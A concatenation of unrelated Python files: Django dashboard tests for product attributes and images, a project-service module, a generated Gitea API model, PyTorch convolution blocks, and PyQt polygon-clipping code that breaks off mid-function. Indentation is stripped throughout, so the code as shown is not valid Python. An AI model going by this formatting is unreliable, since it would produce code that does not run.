assert len(ProductAttribute.objects.all()) == 1
url = reverse('dashboard:product-attribute-add')
data = {'name': 'test', 'slug': 'test'}
response = admin_client.post(url, data, follow=True)
assert response.status_code == 200
assert len(ProductAttribute.objects.all()) == 2
def test_attribute_add_not_valid(color_attribute, admin_client):
assert len(ProductAttribute.objects.all()) == 1
url = reverse('dashboard:product-attribute-add')
data = {}
response = admin_client.post(url, data, follow=True)
assert response.status_code == 200
assert len(ProductAttribute.objects.all()) == 1
def test_attribute_edit(color_attribute, admin_client):
assert len(ProductAttribute.objects.all()) == 1
url = reverse('dashboard:product-attribute-update',
kwargs={'pk': color_attribute.pk})
data = {'name': 'new_name', 'slug': 'new_slug'}
response = admin_client.post(url, data, follow=True)
assert response.status_code == 200
assert len(ProductAttribute.objects.all()) == 1
color_attribute.refresh_from_db()
assert color_attribute.name == 'new_name'
assert color_attribute.slug == 'new_slug'
def test_attribute_delete(color_attribute, admin_client):
assert len(ProductAttribute.objects.all()) == 1
url = reverse('dashboard:product-attribute-delete',
kwargs={'pk': color_attribute.pk})
response = admin_client.post(url, follow=True)
assert response.status_code == 200
assert len(ProductAttribute.objects.all()) == 0
def test_attribute_choice_value_add(color_attribute, admin_client):
values = AttributeChoiceValue.objects.filter(attribute=color_attribute.pk)
assert len(values) == 2
url = reverse('dashboard:product-attribute-value-add',
kwargs={'attribute_pk': color_attribute.pk})
data = {'name': 'Pink', 'color': '#FFF', 'attribute': color_attribute.pk}
response = admin_client.post(url, data, follow=True)
assert response.status_code == 200
values = AttributeChoiceValue.objects.filter(attribute=color_attribute.pk)
assert len(values) == 3
def test_attribute_choice_value_add_not_valid(color_attribute, admin_client):
values = AttributeChoiceValue.objects.filter(attribute=color_attribute.pk)
assert len(values) == 2
url = reverse('dashboard:product-attribute-value-add',
kwargs={'attribute_pk': color_attribute.pk})
data = {}
response = admin_client.post(url, data, follow=True)
assert response.status_code == 200
values = AttributeChoiceValue.objects.filter(attribute=color_attribute.pk)
assert len(values) == 2
def test_attribute_choice_value_edit(color_attribute, admin_client):
values = AttributeChoiceValue.objects.filter(attribute=color_attribute.pk)
assert len(values) == 2
url = reverse('dashboard:product-attribute-value-update',
kwargs={'attribute_pk': color_attribute.pk,
'value_pk': values[0].pk})
data = {'name': 'Pink', 'color': '#FFF', 'attribute': color_attribute.pk}
response = admin_client.post(url, data, follow=True)
assert response.status_code == 200
values = AttributeChoiceValue.objects.filter(
attribute=color_attribute.pk, name='Pink')
assert len(values) == 1
assert values[0].name == 'Pink'
def test_attribute_choice_value_delete(color_attribute, admin_client):
values = AttributeChoiceValue.objects.filter(attribute=color_attribute.pk)
assert len(values) == 2
deleted_value = values[0]
url = reverse('dashboard:product-attribute-value-delete',
kwargs={'attribute_pk': color_attribute.pk,
'value_pk': deleted_value.pk})
response = admin_client.post(url, follow=True)
assert response.status_code == 200
values = AttributeChoiceValue.objects.filter(attribute=color_attribute.pk)
assert len(values) == 1
assert deleted_value not in values
def test_get_formfield_name_with_unicode_characters(db):
text_attribute = ProductAttribute.objects.create(
slug='ąęαβδηθλμπ', name='ąęαβδηθλμπ')
assert text_attribute.get_formfield_name() == 'attribute-ąęαβδηθλμπ'
def test_view_product_toggle_publish(db, admin_client, product_in_stock):
product = product_in_stock
url = reverse('dashboard:product-publish', kwargs={'pk': product.pk})
response = admin_client.post(url)
assert response.status_code == HTTP_STATUS_OK
data = {'success': True, 'is_published': False}
assert json.loads(response.content.decode('utf8')) == data
admin_client.post(url)
product.refresh_from_db()
assert product.is_published
def test_view_product_not_deleted_before_confirmation(
db, admin_client, product_in_stock):
product = product_in_stock
url = reverse('dashboard:product-delete', kwargs={'pk': product.pk})
response = admin_client.get(url)
assert response.status_code == HTTP_STATUS_OK
product.refresh_from_db()
def test_view_product_delete(db, admin_client, product_in_stock):
product = product_in_stock
url = reverse('dashboard:product-delete', kwargs={'pk': product.pk})
response = admin_client.post(url)
assert response.status_code == HTTP_REDIRECTION
assert not Product.objects.filter(pk=product.pk)
def test_view_product_class_not_deleted_before_confirmation(
admin_client, product_in_stock):
product_class = product_in_stock.product_class
url = reverse(
'dashboard:product-class-delete', kwargs={'pk': product_class.pk})
response = admin_client.get(url)
assert response.status_code == HTTP_STATUS_OK
assert ProductClass.objects.filter(pk=product_class.pk)
def test_view_product_class_delete(db, admin_client, product_in_stock):
product_class = product_in_stock.product_class
url = reverse(
'dashboard:product-class-delete', kwargs={'pk': product_class.pk})
response = admin_client.post(url)
assert response.status_code == HTTP_REDIRECTION
assert not ProductClass.objects.filter(pk=product_class.pk)
def test_view_product_variant_not_deleted_before_confirmation(
admin_client, product_in_stock):
product_variant_pk = product_in_stock.variants.first().pk
url = reverse(
'dashboard:variant-delete',
kwargs={
'product_pk': product_in_stock.pk,
'variant_pk': product_variant_pk})
response = admin_client.get(url)
assert response.status_code == HTTP_STATUS_OK
assert ProductVariant.objects.filter(pk=product_variant_pk)
def test_view_product_variant_delete(admin_client, product_in_stock):
product_variant_pk = product_in_stock.variants.first().pk
url = reverse(
'dashboard:variant-delete',
kwargs={
'product_pk': product_in_stock.pk,
'variant_pk': product_variant_pk})
response = admin_client.post(url)
assert response.status_code == HTTP_REDIRECTION
assert not ProductVariant.objects.filter(pk=product_variant_pk)
def test_view_stock_not_deleted_before_confirmation(
admin_client, product_in_stock):
product_variant = product_in_stock.variants.first()
stock = Stock.objects.filter(variant=product_variant).first()
url = reverse(
'dashboard:variant-stock-delete',
kwargs={
'product_pk': product_in_stock.pk,
'variant_pk': product_variant.pk,
'stock_pk': stock.pk})
response = admin_client.get(url)
assert response.status_code == HTTP_STATUS_OK
assert Stock.objects.filter(pk=stock.pk)
def test_view_stock_delete(admin_client, product_in_stock):
product_variant = product_in_stock.variants.first()
stock = Stock.objects.filter(variant=product_variant).first()
url = reverse(
'dashboard:variant-stock-delete',
kwargs={
'product_pk': product_in_stock.pk,
'variant_pk': product_variant.pk,
'stock_pk': stock.pk})
response = admin_client.post(url)
assert response.status_code == HTTP_REDIRECTION
assert not Stock.objects.filter(pk=stock.pk)
def test_view_stock_location_not_deleted_before_confirmation(
admin_client, stock_location):
url = reverse(
'dashboard:product-stock-location-delete',
kwargs={'location_pk': stock_location.pk})
response = admin_client.get(url)
assert response.status_code == HTTP_STATUS_OK
assert StockLocation.objects.filter(pk=stock_location.pk)
def test_view_stock_location_delete(admin_client, stock_location):
url = reverse(
'dashboard:product-stock-location-delete',
kwargs={'location_pk': stock_location.pk})
response = admin_client.post(url)
assert response.status_code == HTTP_REDIRECTION
assert not StockLocation.objects.filter(pk=stock_location.pk)
def test_view_attribute_not_deleted_before_confirmation(
admin_client, color_attribute):
url = reverse(
'dashboard:product-attribute-delete',
kwargs={'pk': color_attribute.pk})
response = admin_client.get(url)
assert response.status_code == HTTP_STATUS_OK
assert ProductAttribute.objects.filter(pk=color_attribute.pk)
def test_view_attribute_delete(admin_client, color_attribute):
url = reverse(
'dashboard:product-attribute-delete',
kwargs={'pk': color_attribute.pk})
response = admin_client.post(url)
assert response.status_code == HTTP_REDIRECTION
assert not ProductAttribute.objects.filter(pk=color_attribute.pk)
def test_view_product_image_not_deleted_before_confirmation(
admin_client, product_with_image):
product_image = product_with_image.images.all()[0]
url = reverse(
'dashboard:product-image-delete',
kwargs={
'img_pk': product_image.pk,
'product_pk': product_with_image.pk})
response = admin_client.get(url)
assert response.status_code == HTTP_STATUS_OK
assert ProductImage.objects.filter(pk=product_image.pk).count()
def test_view_product_image_delete(admin_client, product_with_image):
product_image = product_with_image.images.all()[0]
url = reverse(
'dashboard:product-image-delete',
kwargs={
'img_pk': product_image.pk,
'product_pk': product_with_image.pk})
response = admin_client.post(url)
assert response.status_code == HTTP_REDIRECTION
assert not ProductImage.objects.filter(pk=product_image.pk)
def test_view_reorder_product_images(admin_client, product_with_images):
order_before = [img.pk for img in product_with_images.images.all()]
ordered_images = list(reversed(order_before))
url = reverse(
'dashboard:product-images-reorder',
kwargs={'product_pk': product_with_images.pk})
data = {'ordered_images': ordered_images}
response = admin_client.post(
url, data, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
order_after = [img.pk for img in product_with_images.images.all()]
assert response.status_code == 200
assert order_after == ordered_images
def test_view_invalid_reorder_product_images(
admin_client, product_with_images):
order_before = [img.pk for img in product_with_images.images.all()]
ordered_images = list(reversed(order_before)).append(3)
url = reverse(
'dashboard:product-images-reorder',
kwargs={'product_pk': product_with_images.pk})
data = {'ordered_images': ordered_images}
response = admin_client.post(
url, data, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
assert response.status_code == 400
resp_decoded = json.loads(response.content.decode('utf-8'))
assert 'error' in resp_decoded
assert 'ordered_images' in resp_decoded['error']
def test_view_product_image_add(admin_client, product_with_image):
assert len(ProductImage.objects.all()) == 1
assert len(product_with_image.images.all()) == 1
url = reverse(
'dashboard:product-image-add',
kwargs={'product_pk': product_with_image.pk})
response = admin_client.get(url)
assert response.status_code == 200
image, image_name = create_image()
data = {'image_0': image, 'alt': ['description']}
response = admin_client.post(url, data, follow=True)
assert response.status_code == 200
assert len(ProductImage.objects.all()) == 2
product_with_image.refresh_from_db()
images = product_with_image.images.all()
assert len(images) == 2
assert image_name in images[1].image.name
assert images[1].alt == 'description'
def test_view_product_image_edit_same_image_add_description(
admin_client, product_with_image):
assert len(product_with_image.images.all()) == 1
product_image = product_with_image.images.all()[0]
url = reverse(
'dashboard:product-image-update',
kwargs={
'img_pk': product_image.pk,
'product_pk': product_with_image.pk})
response = admin_client.get(url)
assert response.status_code == 200
data = {'image_1': ['0.49x0.59'], 'alt': ['description']}
response = admin_client.post(url, data, follow=True)
assert response.status_code == 200
assert len(product_with_image.images.all()) == 1
product_image.refresh_from_db()
assert product_image.alt == 'description'
def test_view_product_image_edit_new_image(admin_client, product_with_image):
assert len(product_with_image.images.all()) == 1
product_image = product_with_image.images.all()[0]
url = reverse(
'dashboard:product-image-update',
kwargs={
'img_pk': product_image.pk,
'product_pk': product_with_image.pk})
response = admin_client.get(url)
assert response.status_code == 200
image, image_name = create_image()
data = {'image_0': image, 'alt': ['description']}
response = admin_client.post(url, data, follow=True)
assert response.status_code == 200
assert len(product_with_image.images.all()) == 1
product_image.refresh_from_db()
assert image_name in product_image.image.name
assert product_image.alt == 'description'
def perform_bulk_action(product_list, action):
"""Perform given bulk action on given product list."""
data = {'action': action, 'products': [p.pk for p in product_list]}
form = ProductBulkUpdate(data)
assert form.is_valid()
form.save()
def test_product_bulk_update_form_can_publish_products(product_list):
perform_bulk_action(product_list, ProductBulkAction.PUBLISH)
for p in product_list:
p.refresh_from_db()
assert p.is_published
def test_product_bulk_update_form_can_unpublish_products(product_list):
perform_bulk_action(product_list, ProductBulkAction.UNPUBLISH)
for p in product_list:
p.refresh_from_db()
assert not p.is_published
def test_product_list_filters(admin_client, product_list):
data = {'price_1': [''], 'price_0': [''], 'is_featured': [''],
'name': ['Test'], 'sort_by': [''], 'is_published': ['']}
url = reverse('dashboard:product-list')
response = admin_client.get(url, data)
assert response.status_code == 200
assert list(response.context['filter_set'].qs) == product_list
def test_product_list_filters_sort_by(admin_client, product_list):
data = {'price_1': [''], 'price_0': [''], 'is_featured': [''],
'name': ['Test'], 'sort_by': ['name'], 'is_published': ['']}
url = reverse('dashboard:product-list')
response = admin_client.get(url, data)
assert response.status_code == 200
assert list(response.context['filter_set'].qs) == product_list
data = {'price_1': [''], 'price_0': [''], 'is_featured': [''],
'name': ['Test'], 'sort_by': ['-name'], 'is_published': ['']}
url = reverse('dashboard:product-list')
response = admin_client.get(url, data)
assert response.status_code == 200
assert list(response.context['filter_set'].qs) == product_list[::-1]
def test_product_list_filters_is_published(
admin_client, product_list, default_category):
data = {'price_1': [''], 'price_0': [''], 'is_featured': [''],
'name': ['Test'], 'sort_by': ['name'],
'categories': [default_category.pk], 'is_published': ['1']}
url = reverse('dashboard:product-list')
response = admin_client.get(url, data)
assert response.status_code == 200
result = list(response.context['filter_set'].qs)
assert result == [product_list[0], product_list[2]]
def test_product_list_filters_no_results(admin_client, product_list):
data = {'price_1': [''], 'price_0': [''], 'is_featured': [''],
'name': ['BADTest'], 'sort_by': [''],
'is_published': ['']}
url = reverse('dashboard:product-list')
response = admin_client.get(url, data)
assert response.status_code == 200
assert list(response.context['filter_set'].qs) == []
def test_product_list_pagination(admin_client, product_list):
settings.DASHBOARD_PAGINATE_BY = 1
data = {'page': '1'}
url = reverse('dashboard:product-list')
response = admin_client.get(url, data)
assert response.status_code == 200
assert not response.context['filter_set'].is_bound_unsorted
data = {'page': '2'}
url = reverse('dashboard:product-list')
response = admin_client.get(url, data)
assert response.status_code == 200
assert not response.context['filter_set'].is_bound_unsorted
def test_product_list_pagination_with_filters(admin_client, product_list):
settings.DASHBOARD_PAGINATE_BY = 1
data = {'page': '1', 'price_1': [''], 'price_0': [''], 'is_featured': [''],
'name': ['Test'], 'sort_by': ['name'], 'is_published': ['']}
url = reverse('dashboard:product-list')
response = admin_client.get(url, data)
assert response.status_code == 200
assert list(response.context['products'])[0] == product_list[0]
data = {'page': '2', 'price_1': [''], 'price_0': [''], 'is_featured': [''],
'name': ['Test'], 'sort_by': ['name'], 'is_published': ['']}
url = reverse('dashboard:product-list')
response = admin_client.get(url, data)
assert response.status_code == 200
assert list(response.context['products'])[0] == product_list[1]
def test_product_select_classes(admin_client, product_class):
url = reverse('dashboard:product-add-select-class')
response = admin_client.get(url)
assert response.status_code == HTTP_STATUS_OK
data = {'product_cls': product_class.pk}
response = admin_client.post(url, data)
assert response.get('location') == reverse(
'dashboard:product-add', kwargs={'class_pk': product_class.pk})
assert response.status_code == HTTP_REDIRECTION
def test_product_select_classes_by_ajax(admin_client, product_class):
url = reverse('dashboard:product-add-select-class')
data = {'product_cls': product_class.pk}
response = admin_client.post(
url, data, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
resp_decoded = json.loads(response.content.decode('utf-8'))
assert response.status_code == 200
assert resp_decoded.get('redirectUrl') == reverse(
'dashboard:product-add', kwargs={'class_pk': product_class.pk})
def test_hide_field_in_variant_choice_field_form():
form = VariantChoiceField(Mock)
variants, cart = MagicMock(), MagicMock()
variants.count.return_value = 1
variants.all()[0].pk = 'test'
form.update_field_data(variants, cart)
assert isinstance(form.widget, HiddenInput)
assert form.widget.attrs.get('value') == 'test'
|
<reponame>SeanFitzpatrick0/BugKiller
import asyncio
import logging
from typing import List, Tuple
from bug_killer_api_interface.schemas.request.project import UpdateProjectPayload, CreateProjectPayload
from bug_killer_app.access.datastore.project import get_user_association_items, create_project_items, \
update_project_items, delete_project_items, get_all_project_items
from bug_killer_app.access.entities.permission import assert_user_has_project_manager_access
from bug_killer_app.datastore.project_table.project_item import ProjectItem, ProjectAssociationPrefix
from bug_killer_app.domain.exceptions import EmptyUpdateException, NoChangesInUpdateException
from bug_killer_app.domain.types import AllProjectItems
from bug_killer_app.models.project import BkAppProject
from bug_killer_utils.collections import is_dict_empty
from bug_killer_utils.strings import remove_prefix
async def get_users_projects(user_id: str) -> Tuple[List[BkAppProject], List[BkAppProject]]:
logging.info(f'Getting the projects user {user_id} is a member or manager of')
# Get users project ids
manager_association_items, member_association_items = await get_user_association_items(user_id)
manager_project_ids = set([item.project_id for item in manager_association_items])
member_project_ids = set([item.project_id for item in member_association_items])
# Get Projects
projects = await asyncio.gather(
*[get_project(project_id) for project_id in manager_project_ids | member_project_ids]
)
manager_projects = projects[:len(manager_project_ids)]
member_projects = projects[len(manager_project_ids):]
return manager_projects, member_projects
async def get_project(project_id: str) -> BkAppProject:
logging.info(f'Getting project by id: {project_id}')
project_items = await get_all_project_items(project_id)
return BkAppProject.from_db_items(*project_items)
async def create_project(manager_id: str, payload: CreateProjectPayload) -> BkAppProject:
logging.info(f'Creating project with {manager_id = } {payload = }')
project_item, manager_item, member_items = await create_project_items(manager_id, payload)
project = BkAppProject.from_db_items(
project_item,
manager_item=manager_item,
member_items=member_items,
bug_items=[]
)
logging.info(f'Created {project = }')
return project
async def update_project(user_id: str, project_id: str, payload: UpdateProjectPayload) -> BkAppProject:
logging.info(f'Updating project with {user_id = } {project_id = } {payload = }')
if is_dict_empty(payload.api_dict()):
raise EmptyUpdateException()
project = await get_project(project_id)
assert_user_has_project_manager_access(user_id, project)
project_items = project.to_db_items()
items_to_update = _get_project_items_to_update(payload, project_items)
if not items_to_update:
raise NoChangesInUpdateException()
project_item = project_items[0]
update_project_items(project_item, items_to_update)
project = BkAppProject.from_db_items(*project_items)
return project
def _get_project_items_to_update(
payload: UpdateProjectPayload,
project_items: AllProjectItems
) -> List[ProjectItem]:
project_item, manager_item, _, _ = project_items
manager = remove_prefix(ProjectAssociationPrefix.MANAGER.value, manager_item.project_association)
items_to_update = []
if (payload.title and payload.title != project_item.title) or \
(payload.description and payload.description != project_item.description):
logging.info('Updating project title and/or description')
project_item.title = payload.title if payload.title else project_item.title
project_item.description = payload.description if payload.description else project_item.description
items_to_update.append(project_item)
if payload.manager and payload.manager != manager:
logging.info('Updating project manager')
manager_item.project_association = ProjectAssociationPrefix.MANAGER.value + payload.manager
items_to_update.append(manager_item)
return items_to_update
async def delete_project(user_id: str, project_id: str) -> BkAppProject:
logging.info(f'Deleting project with {user_id = } {project_id = }')
project = await get_project(project_id)
assert_user_has_project_manager_access(user_id, project)
logging.info(f'Deleting {project = }')
await delete_project_items(project.to_db_items())
return project
|
# coding: utf-8
"""
Gitea API.
This documentation describes the Gitea API. # noqa: E501
OpenAPI spec version: 1.15.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from gitea_api.configuration import Configuration
class InternalTracker(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'allow_only_contributors_to_track_time': 'bool',
'enable_issue_dependencies': 'bool',
'enable_time_tracker': 'bool'
}
attribute_map = {
'allow_only_contributors_to_track_time': 'allow_only_contributors_to_track_time',
'enable_issue_dependencies': 'enable_issue_dependencies',
'enable_time_tracker': 'enable_time_tracker'
}
def __init__(self, allow_only_contributors_to_track_time=None, enable_issue_dependencies=None, enable_time_tracker=None, _configuration=None): # noqa: E501
"""InternalTracker - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._allow_only_contributors_to_track_time = None
self._enable_issue_dependencies = None
self._enable_time_tracker = None
self.discriminator = None
if allow_only_contributors_to_track_time is not None:
self.allow_only_contributors_to_track_time = allow_only_contributors_to_track_time
if enable_issue_dependencies is not None:
self.enable_issue_dependencies = enable_issue_dependencies
if enable_time_tracker is not None:
self.enable_time_tracker = enable_time_tracker
@property
def allow_only_contributors_to_track_time(self):
"""Gets the allow_only_contributors_to_track_time of this InternalTracker. # noqa: E501
Let only contributors track time (Built-in issue tracker) # noqa: E501
:return: The allow_only_contributors_to_track_time of this InternalTracker. # noqa: E501
:rtype: bool
"""
return self._allow_only_contributors_to_track_time
@allow_only_contributors_to_track_time.setter
def allow_only_contributors_to_track_time(self, allow_only_contributors_to_track_time):
"""Sets the allow_only_contributors_to_track_time of this InternalTracker.
Let only contributors track time (Built-in issue tracker) # noqa: E501
:param allow_only_contributors_to_track_time: The allow_only_contributors_to_track_time of this InternalTracker. # noqa: E501
:type: bool
"""
self._allow_only_contributors_to_track_time = allow_only_contributors_to_track_time
@property
def enable_issue_dependencies(self):
"""Gets the enable_issue_dependencies of this InternalTracker. # noqa: E501
Enable dependencies for issues and pull requests (Built-in issue tracker) # noqa: E501
:return: The enable_issue_dependencies of this InternalTracker. # noqa: E501
:rtype: bool
"""
return self._enable_issue_dependencies
@enable_issue_dependencies.setter
def enable_issue_dependencies(self, enable_issue_dependencies):
"""Sets the enable_issue_dependencies of this InternalTracker.
Enable dependencies for issues and pull requests (Built-in issue tracker) # noqa: E501
:param enable_issue_dependencies: The enable_issue_dependencies of this InternalTracker. # noqa: E501
:type: bool
"""
self._enable_issue_dependencies = enable_issue_dependencies
@property
def enable_time_tracker(self):
"""Gets the enable_time_tracker of this InternalTracker. # noqa: E501
Enable time tracking (Built-in issue tracker) # noqa: E501
:return: The enable_time_tracker of this InternalTracker. # noqa: E501
:rtype: bool
"""
return self._enable_time_tracker
@enable_time_tracker.setter
def enable_time_tracker(self, enable_time_tracker):
"""Sets the enable_time_tracker of this InternalTracker.
Enable time tracking (Built-in issue tracker) # noqa: E501
:param enable_time_tracker: The enable_time_tracker of this InternalTracker. # noqa: E501
:type: bool
"""
self._enable_time_tracker = enable_time_tracker
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(InternalTracker, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, InternalTracker):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, InternalTracker):
return True
return self.to_dict() != other.to_dict()
|
r"""
This module contains convolutional model blocks.
"""
from torch import nn as nn
from vp_suite.base import VPModelBlock
class DoubleConv2d(VPModelBlock):
r"""
This class implements a 2D double-conv block, as used in the popular UNet architecture
(Ronneberger et al., arxiv.org/abs/1505.04597).
"""
NAME = "DoubleConv2d"
PAPER_REFERENCE = "arxiv.org/abs/1505.04597"
def __init__(self, in_channels, out_channels):
super(DoubleConv2d, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(3, 3), stride=(1, 1),
padding=1, padding_mode='replicate', bias=False),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=(3, 3), stride=(1, 1),
padding=1, padding_mode='replicate', bias=False),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
)
def forward(self, x):
return self.conv(x)
class DoubleConv3d(VPModelBlock):
r"""
The class implements a 3D double-conv block, an extension of the :class:`DoubleConv2d` block
to also process the time dimension.
"""
NAME = "DoubleConv3d"
def __init__(self, in_channels, out_channels):
super(DoubleConv3d, self).__init__()
self.conv = nn.Sequential(
nn.Conv3d(in_channels=in_channels, out_channels=out_channels, kernel_size=(3, 3, 3), stride=(1, 1, 1),
padding=1, padding_mode='replicate', bias=False),
nn.BatchNorm3d(out_channels),
nn.ReLU(inplace=True),
nn.Conv3d(in_channels=out_channels, out_channels=out_channels, kernel_size=(3, 3, 3), stride=(1, 1, 1),
padding=1, padding_mode='replicate', bias=False),
nn.BatchNorm3d(out_channels),
nn.ReLU(inplace=True),
)
def forward(self, x):
return self.conv(x)
class DCGANConv(VPModelBlock):
r"""
The class implements a DCGAN conv layer, as introduced in Radford et al. (arxiv.org/abs/1511.06434).
"""
NAME = "DCGAN - Conv"
PAPER_REFERENCE = "arxiv.org/abs/1511.06434"
def __init__(self, in_channels, out_channels, stride):
super(DCGANConv, self).__init__()
self.main = nn.Sequential(
nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(3, 3), stride=stride, padding=1),
nn.GroupNorm(16, out_channels),
nn.LeakyReLU(0.2, inplace=True),
)
def forward(self, x):
return self.main(x)
class DCGANConvTranspose(VPModelBlock):
r"""
The class implements a DCGAN convTranspose layer, as introduced in Radford et al. (arxiv.org/abs/1511.06434).
"""
NAME = "DCGAN - ConvTranspose"
PAPER_REFERENCE = "arxiv.org/abs/1511.06434"
def __init__(self, in_channels, out_channels, stride):
super(DCGANConvTranspose, self).__init__()
output_pad = int(stride == 2)
self.main = nn.Sequential(
nn.ConvTranspose2d(in_channels=in_channels, out_channels=out_channels,
kernel_size=(3, 3), stride=stride, padding=1, output_padding=(output_pad, output_pad)),
nn.GroupNorm(16, out_channels),
nn.LeakyReLU(0.2, inplace=True),
)
def forward(self, x):
return self.main(x)
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import Qt, QThread
from PyQt5.QtGui import QBrush, QPen, QColor, QImage
from math import *
class MyScene(QtWidgets.QGraphicsScene):
segment_arr = []
first_point = None
link_dist = 10
cut_arr = []
cut_obj = []
cut_p1 = None
cut_plast = None
polygon_arr = []
polygon_obj = []
polygon_p1 = None
polygon_plast = None
edge_color = Qt.red
edge_pen = QPen(edge_color)
edge_pen.setWidth(1)
cut_color = Qt.white
cut_pen = QPen(cut_color)
result_color = Qt.yellow
result_pen = QPen(result_color)
inv_brush = QBrush(QColor(Qt.black))
def setup(self, bg_color):
self.bg_color = bg_color
self.setBackgroundBrush(QBrush(bg_color))
inv_color = QColor(bg_color)
inv_color.setAlphaF(0)
self.inv_brush = QBrush(inv_color)
def clear(self, clear_image=True):
if clear_image:
self.segment_arr = []
self.clear_cut()
self.clear_polygon()
self.first_point = None
super().clear()
# Set the brush's colors
def set_edge_color(self, color):
self.edge_color = color
self.edge_pen.setColor(QColor(color))
def set_cut_color(self, color):
self.cut_color = color
self.cut_pen.setColor(QColor(color))
# Input edges function
def is_closed(self, first_point, point):
x_into = abs(first_point[0] - point[0]) < self.link_dist
y_into = abs(first_point[1] - point[1]) < self.link_dist
return x_into and y_into
def add_cut_edge(self, p1, p2):
if p1 == p2:
return
draw_obj = self.addLine(*p1, *p2, self.cut_pen)
self.cut_obj.append(draw_obj)
self.cut_arr.append((p1, p2))
def add_cut_point(self, point, is_orto):
if self.cut_p1 is None:
self.cut_p1 = point
self.cut_plast = point
return
if is_orto:
dx = point[0] - self.cut_plast[0]
dy = point[1] - self.cut_plast[1]
# Горизонтальная линия
if abs(dx) > abs(dy):
point[1] = self.cut_plast[1]
else:
point[0] = self.cut_plast[0]
if self.is_closed(self.cut_p1, point):
point = self.cut_p1
self.add_cut_edge(self.cut_plast, point)
self.cut_plast = point
if point == self.cut_p1:
print(self.cut_arr)
return point == self.cut_p1
def add_poly_edge(self, p1, p2):
if p1 == p2: return
draw_obj = self.addLine(*p1, *p2, self.edge_pen)
self.polygon_obj.append(draw_obj)
self.polygon_arr.append((p1, p2))
def add_poly_point(self, point, is_orto, color):
if self.polygon_p1 is None:
self.set_edge_color(color)
if len(self.polygon_arr) != 0:
self.clear_polygon()
self.polygon_p1 = point
self.polygon_plast = point
return
if is_orto:
dx = point[0] - self.polygon_plast[0]
dy = point[1] - self.polygon_plast[1]
# Горизонтальная линия
if abs(dx) > abs(dy):
point[1] = self.polygon_plast[1]
else:
point[0] = self.polygon_plast[0]
elif len(self.cut_arr):
for cut_seg in self.cut_arr:
if self.is_closed(cut_seg[0], point):
print("Hook the vertex")
point = cut_seg[0]
break
else:
for cut_seg in self.cut_arr:
edge_cross = cross_point(cut_seg, [self.polygon_plast, point])
if edge_cross is None: continue
if self.is_closed(edge_cross, point):
print("Hook the cross!")
point = edge_cross
break
if self.is_closed(self.polygon_p1, point):
point = self.polygon_p1
self.add_poly_edge(self.polygon_plast, point)
self.polygon_plast = point
if point == self.polygon_p1:
print(self.polygon_arr)
self.polygon_p1 = None
self.polygon_plast = None
return
def clear_cut(self):
self.cut_p1 = None
self.cut_plast = None
for draw in self.cut_obj:
self.removeItem(draw)
self.cut_obj = []
self.cut_arr = []
def clear_polygon(self):
self.polygon_p1 = None
self.polygon_plast = None
for draw in self.polygon_obj:
self.removeItem(draw)
self.polygon_obj = []
self.polygon_arr = []
#
# Cyrus - Beck cut algorithm
#
def sutherland_hodgman_cut(self):
cut_dir = is_convex(self.cut_arr)
if not cut_dir: return False
np = len(self.polygon_arr)
p = list(point[0] for point in self.polygon_arr)
nc = len(self.cut_arr)
c = list(point[0] for point in self.cut_arr)
c.append(c[0])
f, s = None, None
for i in range(nc):
nq = 0
q = []
for j in range(np):
if j == 0:
f = p[0]
elif is_cross((s, p[j]), (c[i], c[i+1])):
cross_p = find_cross((s, p[j]), (c[i], c[i+1]))
q.append(cross_p)
nq += 1
s = p[j]
if is_visible(s, (c[i], c[i+1])) * cut_dir >= 0:
q.append(s)
nq += 1
if nq != 0 and is_cross((s, f), (c[i], c[i+1])):
cross_p = find_cross((s, f), (c[i], c[i + 1]))
q.append(cross_p)
nq += 1
p = q
np = nq
if np < 2: break
for i in range(np):
self.draw_line(p[i-1], p[i])
return True
# Figures drawing
def draw_line(self, p1, p2):
self.addLine(*p1, *p2, self.result_pen)
def line_equation(p1, p2):
A = p2[1] - p1[1]
B = p1[0] - p2[0]
C = -p1[0] * A - p1[1] * B
return A, B, C
def edge_mid(p1, p2):
p = [0, 0]
p[0] = (p1[0] + p2[0]) / 2
p[1] = (p1[1] + p2[1]) / 2
return p
def edge_dir(p1, p2):
x = p2[0] - p1[0]
y = p2[1] - p1[1]
return [x, y]
def edge_normal(p1, p2):
x = p2[1] - p1[1]
y = p1[0] - p2[0]
return [x, y]
def edge_ratio(p0, d, t):
p = [0, 0]
p[0] = p0[0] + d[0]*t
p[1] = p0[1] + d[1]*t
return p
def scalar_mlt(v1, v2):
return v1[0]*v2[0] + v1[1]*v2[1]
def vector_mlt(v1, v2):
return v1[0]*v2[1] - v1[1]*v2[0]
def neg_vector(v):
return [-v[0], -v[1]]
def find_normals(edge_arr, is_invert):
normal_arr = [None] * len(edge_arr)
for i in range(len(edge_arr)):
